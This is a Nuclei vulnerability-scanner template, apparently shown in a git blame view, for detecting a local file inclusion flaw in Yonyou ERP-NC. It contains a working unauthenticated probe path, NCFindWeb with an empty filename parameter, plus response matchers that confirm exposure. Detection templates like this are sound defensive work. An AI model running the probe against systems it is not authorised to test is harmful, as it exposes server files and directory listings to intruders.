nuclei-templates/vulnerabilities/yonyou/erp-nc-directory-traversal....

36 lines
769 B
YAML
Raw Normal View History

2021-04-13 07:18:15 +00:00
id: erp-nc-directory-traversal
info:
name: ERP-NC - Local File Inclusion
2021-04-13 07:18:15 +00:00
author: pikpikcu
severity: high
description: ERP-NC is vulnerable to local file inclusion.
reference:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2021-04-13 07:18:15 +00:00
tags: lfi,erp-nc
requests:
- method: GET
path:
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename="
matchers-condition: and
matchers:
- type: word
words:
- "Client"
- "ncwslogin.jsp"
- "admin.jsp"
part: body
2021-04-13 20:23:24 +00:00
condition: and
2021-04-13 07:18:15 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/07/29